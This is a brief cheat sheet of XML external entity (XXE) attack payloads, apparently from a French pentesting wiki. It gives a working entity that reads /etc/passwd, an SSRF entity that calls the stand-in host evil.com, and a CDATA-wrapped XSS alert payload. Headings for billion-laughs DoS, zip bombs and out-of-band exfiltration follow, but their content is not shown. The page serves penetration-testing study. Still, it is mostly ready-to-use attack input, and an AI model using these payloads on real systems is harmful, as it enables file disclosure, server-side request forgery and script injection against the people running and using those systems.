📃XXE
Basic LFI
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<element>
&xxe;
</element>SSRF via XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://evil.com/"> ]>
<element>
&xxe;
</element>XSS via XXE
<element>
<![CDATA['><script>alert(1);</script>]]>
</element>XXE avec Xinclude
DoS
Billion laughs attack
Quadratic Blowup
Zip bomb
Exfiltration de données
Avec Burp collab
Exploit server
Victim server
Via message d'erreur
Exploit server
Victim server
Mis à jour